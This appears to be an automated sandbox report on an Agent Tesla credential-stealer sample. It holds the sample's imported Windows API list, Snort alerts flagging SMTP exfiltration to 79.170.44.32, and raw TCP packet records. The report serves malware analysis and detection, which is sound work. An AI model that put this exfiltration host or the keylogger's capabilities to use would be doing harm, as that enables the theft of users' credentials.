USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/01/24-20:28:15.672861	TCP	2840032	ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2	49746	587	192.168.2.4	79.170.44.32
07/01/24-20:27:10.465136	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49739	587	192.168.2.4	79.170.44.32
07/01/24-20:28:55.662732	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49751	587	192.168.2.4	79.170.44.32
07/01/24-20:27:54.008944	TCP	2855542	ETPRO TROJAN Agent Tesla CnC Exfil Activity	49744	587	192.168.2.4	79.170.44.32
07/01/24-20:27:49.212686	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49743	587	192.168.2.4	79.170.44.32
07/01/24-20:29:20.588265	TCP	2840032	ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2	49754	587	192.168.2.4	79.170.44.32
07/01/24-20:28:17.781472	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49747	587	192.168.2.4	79.170.44.32
07/01/24-20:25:22.036965	TCP	2855245	ETPRO TROJAN Agent Tesla Exfil via SMTP	49731	587	192.168.2.4	79.170.44.32
07/01/24-20:25:22.036854	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49731	587	192.168.2.4	79.170.44.32
07/01/24-20:27:36.709148	TCP	2840032	ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2	49742	587	192.168.2.4	79.170.44.32
07/01/24-20:28:55.662732	TCP	2855542	ETPRO TROJAN Agent Tesla CnC Exfil Activity	49751	587	192.168.2.4	79.170.44.32
07/01/24-20:28:17.781472	TCP	2855542	ETPRO TROJAN Agent Tesla CnC Exfil Activity	49747	587	192.168.2.4	79.170.44.32
07/01/24-20:29:11.831875	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49753	587	192.168.2.4	79.170.44.32
07/01/24-20:29:20.587012	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49754	587	192.168.2.4	79.170.44.32
07/01/24-20:27:10.465136	TCP	2855542	ETPRO TROJAN Agent Tesla CnC Exfil Activity	49739	587	192.168.2.4	79.170.44.32
07/01/24-20:27:36.708969	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49742	587	192.168.2.4	79.170.44.32
07/01/24-20:27:22.436606	TCP	2855542	ETPRO TROJAN Agent Tesla CnC Exfil Activity	49740	587	192.168.2.4	79.170.44.32
07/01/24-20:25:22.036965	TCP	2840032	ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2	49731	587	192.168.2.4	79.170.44.32
07/01/24-20:27:10.465136	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49739	587	192.168.2.4	79.170.44.32
07/01/24-20:28:55.662771	TCP	2840032	ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2	49751	587	192.168.2.4	79.170.44.32
07/01/24-20:27:54.008944	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49744	587	192.168.2.4	79.170.44.32
07/01/24-20:28:15.672815	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49746	587	192.168.2.4	79.170.44.32
07/01/24-20:28:01.279510	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49745	587	192.168.2.4	79.170.44.32
07/01/24-20:25:22.036965	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49731	587	192.168.2.4	79.170.44.32
07/01/24-20:28:01.279625	TCP	2840032	ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2	49745	587	192.168.2.4	79.170.44.32
07/01/24-20:27:10.465306	TCP	2840032	ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2	49739	587	192.168.2.4	79.170.44.32
07/01/24-20:27:49.212686	TCP	2855542	ETPRO TROJAN Agent Tesla CnC Exfil Activity	49743	587	192.168.2.4	79.170.44.32
07/01/24-20:28:55.662704	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49751	587	192.168.2.4	79.170.44.32
07/01/24-20:28:15.672815	TCP	2855542	ETPRO TROJAN Agent Tesla CnC Exfil Activity	49746	587	192.168.2.4	79.170.44.32
07/01/24-20:27:22.436606	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49740	587	192.168.2.4	79.170.44.32
07/01/24-20:29:11.831915	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49753	587	192.168.2.4	79.170.44.32
07/01/24-20:28:36.337233	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49748	587	192.168.2.4	79.170.44.32
07/01/24-20:29:07.465085	TCP	2855542	ETPRO TROJAN Agent Tesla CnC Exfil Activity	49752	587	192.168.2.4	79.170.44.32
07/01/24-20:29:20.587012	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49754	587	192.168.2.4	79.170.44.32
07/01/24-20:27:54.008911	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49744	587	192.168.2.4	79.170.44.32
07/01/24-20:28:01.279551	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49745	587	192.168.2.4	79.170.44.32
07/01/24-20:28:36.337328	TCP	2840032	ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2	49748	587	192.168.2.4	79.170.44.32
07/01/24-20:27:36.709124	TCP	2855542	ETPRO TROJAN Agent Tesla CnC Exfil Activity	49742	587	192.168.2.4	79.170.44.32
07/01/24-20:29:07.465136	TCP	2840032	ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2	49752	587	192.168.2.4	79.170.44.32
07/01/24-20:25:22.036965	TCP	2855542	ETPRO TROJAN Agent Tesla CnC Exfil Activity	49731	587	192.168.2.4	79.170.44.32
07/01/24-20:27:22.436582	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49740	587	192.168.2.4	79.170.44.32
07/01/24-20:28:01.279551	TCP	2855542	ETPRO TROJAN Agent Tesla CnC Exfil Activity	49745	587	192.168.2.4	79.170.44.32
07/01/24-20:27:54.008982	TCP	2840032	ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2	49744	587	192.168.2.4	79.170.44.32
07/01/24-20:29:11.831915	TCP	2855542	ETPRO TROJAN Agent Tesla CnC Exfil Activity	49753	587	192.168.2.4	79.170.44.32
07/01/24-20:28:17.781450	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49747	587	192.168.2.4	79.170.44.32
07/01/24-20:29:07.465085	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49752	587	192.168.2.4	79.170.44.32
07/01/24-20:28:17.783319	TCP	2840032	ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2	49747	587	192.168.2.4	79.170.44.32
07/01/24-20:27:49.212618	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49743	587	192.168.2.4	79.170.44.32
07/01/24-20:28:36.337328	TCP	2855542	ETPRO TROJAN Agent Tesla CnC Exfil Activity	49748	587	192.168.2.4	79.170.44.32
07/01/24-20:29:11.831952	TCP	2840032	ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2	49753	587	192.168.2.4	79.170.44.32
07/01/24-20:27:22.436734	TCP	2840032	ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2	49740	587	192.168.2.4	79.170.44.32
07/01/24-20:28:36.337328	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49748	587	192.168.2.4	79.170.44.32
07/01/24-20:27:36.709124	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49742	587	192.168.2.4	79.170.44.32
07/01/24-20:29:07.465069	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49752	587	192.168.2.4	79.170.44.32
07/01/24-20:28:15.672800	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49746	587	192.168.2.4	79.170.44.32
07/01/24-20:29:20.587012	TCP	2855542	ETPRO TROJAN Agent Tesla CnC Exfil Activity	49754	587	192.168.2.4	79.170.44.32
07/01/24-20:27:49.212736	TCP	2840032	ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2	49743	587	192.168.2.4	79.170.44.32

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 1, 2024 20:25:18.419693947 CEST	49730	443	192.168.2.4	104.26.12.205
Jul 1, 2024 20:25:18.419724941 CEST	443	49730	104.26.12.205	192.168.2.4
Jul 1, 2024 20:25:18.419802904 CEST	49730	443	192.168.2.4	104.26.12.205
Jul 1, 2024 20:25:18.432101965 CEST	49730	443	192.168.2.4	104.26.12.205
Jul 1, 2024 20:25:18.432112932 CEST	443	49730	104.26.12.205	192.168.2.4
Jul 1, 2024 20:25:18.910468102 CEST	443	49730	104.26.12.205	192.168.2.4
Jul 1, 2024 20:25:18.910586119 CEST	49730	443	192.168.2.4	104.26.12.205
Jul 1, 2024 20:25:18.913753986 CEST	49730	443	192.168.2.4	104.26.12.205
Jul 1, 2024 20:25:18.913764000 CEST	443	49730	104.26.12.205	192.168.2.4
Jul 1, 2024 20:25:18.913983107 CEST	443	49730	104.26.12.205	192.168.2.4
Jul 1, 2024 20:25:18.957185030 CEST	49730	443	192.168.2.4	104.26.12.205
Jul 1, 2024 20:25:18.966917038 CEST	49730	443	192.168.2.4	104.26.12.205
Jul 1, 2024 20:25:19.008527040 CEST	443	49730	104.26.12.205	192.168.2.4
Jul 1, 2024 20:25:19.078680992 CEST	443	49730	104.26.12.205	192.168.2.4
Jul 1, 2024 20:25:19.078743935 CEST	443	49730	104.26.12.205	192.168.2.4
Jul 1, 2024 20:25:19.078834057 CEST	49730	443	192.168.2.4	104.26.12.205
Jul 1, 2024 20:25:19.085501909 CEST	49730	443	192.168.2.4	104.26.12.205
Jul 1, 2024 20:25:19.753283978 CEST	49731	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:25:19.759207010 CEST	587	49731	79.170.44.32	192.168.2.4
Jul 1, 2024 20:25:19.759274960 CEST	49731	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:25:20.732445955 CEST	587	49731	79.170.44.32	192.168.2.4
Jul 1, 2024 20:25:20.732642889 CEST	49731	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:25:20.737683058 CEST	587	49731	79.170.44.32	192.168.2.4
Jul 1, 2024 20:25:20.920974970 CEST	587	49731	79.170.44.32	192.168.2.4
Jul 1, 2024 20:25:20.922017097 CEST	49731	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:25:20.927027941 CEST	587	49731	79.170.44.32	192.168.2.4
Jul 1, 2024 20:25:21.109067917 CEST	587	49731	79.170.44.32	192.168.2.4
Jul 1, 2024 20:25:21.109325886 CEST	49731	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:25:21.114300013 CEST	587	49731	79.170.44.32	192.168.2.4
Jul 1, 2024 20:25:21.301157951 CEST	587	49731	79.170.44.32	192.168.2.4
Jul 1, 2024 20:25:21.301393032 CEST	49731	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:25:21.306246042 CEST	587	49731	79.170.44.32	192.168.2.4
Jul 1, 2024 20:25:21.488816977 CEST	587	49731	79.170.44.32	192.168.2.4
Jul 1, 2024 20:25:21.488975048 CEST	49731	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:25:21.494349003 CEST	587	49731	79.170.44.32	192.168.2.4
Jul 1, 2024 20:25:21.833760023 CEST	587	49731	79.170.44.32	192.168.2.4
Jul 1, 2024 20:25:21.833945036 CEST	49731	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:25:21.839176893 CEST	587	49731	79.170.44.32	192.168.2.4
Jul 1, 2024 20:25:22.036159039 CEST	587	49731	79.170.44.32	192.168.2.4
Jul 1, 2024 20:25:22.036854029 CEST	49731	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:25:22.036964893 CEST	49731	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:25:22.036964893 CEST	49731	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:25:22.036964893 CEST	49731	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:25:22.041878939 CEST	587	49731	79.170.44.32	192.168.2.4
Jul 1, 2024 20:25:22.046334028 CEST	587	49731	79.170.44.32	192.168.2.4
Jul 1, 2024 20:25:22.046792030 CEST	587	49731	79.170.44.32	192.168.2.4
Jul 1, 2024 20:25:22.046806097 CEST	587	49731	79.170.44.32	192.168.2.4
Jul 1, 2024 20:25:22.453134060 CEST	587	49731	79.170.44.32	192.168.2.4
Jul 1, 2024 20:25:22.504117012 CEST	49731	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:26:59.707380056 CEST	49731	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:26:59.713464975 CEST	587	49731	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:00.096755981 CEST	587	49731	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:00.097325087 CEST	587	49731	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:00.105726957 CEST	49731	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:00.105726957 CEST	49731	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:00.110766888 CEST	587	49731	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:08.706722021 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:08.712594032 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:08.712901115 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:09.308615923 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:09.308748960 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:09.313673019 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:09.495465040 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:09.495635986 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:09.500508070 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:09.684573889 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:09.684802055 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:09.689723015 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:09.876250029 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:09.876403093 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:09.881366014 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.065507889 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.073518038 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:10.079065084 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.270013094 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.277075052 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:10.282160997 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.463644028 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.465136051 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:10.465136051 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:10.465136051 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:10.465306044 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:10.468758106 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:10.470107079 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.470138073 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.470187902 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.470216990 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.470305920 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:10.473664999 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.473697901 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.473831892 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.473860025 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.473886967 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:10.473941088 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:10.475147963 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.477008104 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:10.478859901 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.478924036 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.478954077 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.479006052 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.479060888 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.479140997 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.479178905 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:10.479302883 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:10.479698896 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.480073929 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:10.481977940 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.482074022 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.482084036 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:10.482181072 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:10.484225988 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.484312057 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.484363079 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.484402895 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:10.484462023 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.484510899 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.484539032 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.484563112 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:10.484591007 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.484658957 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.484702110 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.484730005 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.485117912 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.485196114 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.485223055 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.485249996 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.485280037 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.485306978 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.487260103 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.487292051 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.487318993 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.487345934 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.487395048 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.487421989 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.487448931 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.487494946 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.489906073 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.489969969 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.489996910 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.490025043 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.490072966 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.490101099 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.490128040 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.490176916 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.490204096 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.490231037 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.490281105 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.490309000 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.490335941 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.490367889 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.490395069 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.490422010 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.491900921 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:10.493001938 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:10.497912884 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:11.276200056 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:11.316529989 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:12.314333916 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:12.315871000 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:12.316076040 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:12.316150904 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:12.316152096 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:12.316152096 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:19.827333927 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:19.832308054 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:20.215081930 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:20.215421915 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:20.215493917 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:20.215560913 CEST	49739	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:20.216291904 CEST	49740	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:20.220498085 CEST	587	49739	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:20.221288919 CEST	587	49740	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:20.221365929 CEST	49740	587	192.168.2.4	79.170.44.32
Jul 1, 2024 20:27:21.185137987 CEST	587	49740	79.170.44.32	192.168.2.4
Jul 1, 2024 20:27:21.185250044 CEST	49740	587	192.168.2.4	79.170.44.32
